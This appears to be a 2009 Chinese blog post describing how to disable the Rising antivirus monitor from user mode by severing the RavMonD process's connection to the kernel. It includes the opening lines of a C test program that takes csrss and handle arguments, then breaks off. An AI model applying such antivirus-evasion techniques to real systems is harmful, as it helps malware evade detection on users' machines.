您当前的位置: 首页 >  安全

用户层关闭瑞星2009杀毒软件安全保护

发布时间:2009-07-29 18:49:00 ,浏览量:0

我写这个纯粹是hacker精神,如果被滥用做病毒木马一类的邋遢东东,可跟偶没关系哦。

原理very简单,我发现瑞星监控主要在RavMonD进程中,如果打破其与内核的联系,则

瑞星监控功能就无法正常工作了,怎么打破联系呢?如果是进内核的话当然有很多的办法,

从而没有挑战性了,况且RavMonD会阻止用户进程去加载驱动或者动注册表的关键地方,

比如run子键。下面上测试代码:

int main(int argc,char *argv[]) {     if(argc != 4)         puts("usage ccon csrss.pid prmd.handle hooksys.handle");     else     {         int pid = atoi(argv[1]);         int hprmd =

关注
打赏
1688896170
查看更多评论

暂无认证

  • 0浏览

    0关注

    107766博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文
立即登录/注册

微信扫码登录

0.4837s